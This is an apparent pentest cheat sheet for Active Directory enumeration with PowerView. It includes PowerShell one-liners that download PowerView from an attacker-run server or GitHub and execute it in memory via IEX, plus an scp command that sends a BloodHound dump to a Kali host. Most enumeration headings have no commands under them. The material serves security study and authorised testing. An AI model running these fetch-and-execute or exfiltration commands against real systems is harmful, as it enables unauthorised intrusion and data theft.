AD Enumeration

File transfer

Linux to Windows

# From Linux to Windows: download a script into memory on the Windows host and run it
# Local: the script is hosted on your own web server (here 192.168.1.1)
(new-object system.net.webclient).downloadstring('http://192.168.1.1/powerview.ps1') | IEX
# Remote: the script is pulled straight from the PowerSploit GitHub repository
(new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1') | IEX

Windows to Linux

scp local_file username@hostname_or_ip:/remote/path
# Example
scp 20240830124156_BloodHound.zip kali@10.50.57.149:/var/www/uploads

PowerView Enumeration

Get current domain

Get-NetDomain

Get object of another domain

Get domain SID for the current domain

Get domain policy for the current domain

Get domain policy for another domain

Get domain controllers for the current domain

Get domain controllers for another domain

Get a list of users in the current domain

Get list of all properties for users in the current domain

Search for a particular string in a user's attributes

Get a list of computers in the current domain

Get all the groups in the current domain

Get all groups containing the word "admin" in group name

Get all the members of the Domain Admins group

Get the group membership for a user

List all the local groups on a machine (needs administrator privileges on non-DC machines)

Get members of all the local groups on a machine (needs administrator privileges on non-DC machines)

Get actively logged users on a computer (needs local admin rights on the target)

Get locally logged users on a computer (needs the Remote Registry service on the target, which is started by default on server OS)

Get the last logged user on a computer (needs administrative rights and the Remote Registry service on the target)

Find shares on hosts in the current domain

Find sensitive files on computers in the domain

Get all fileservers of the domain
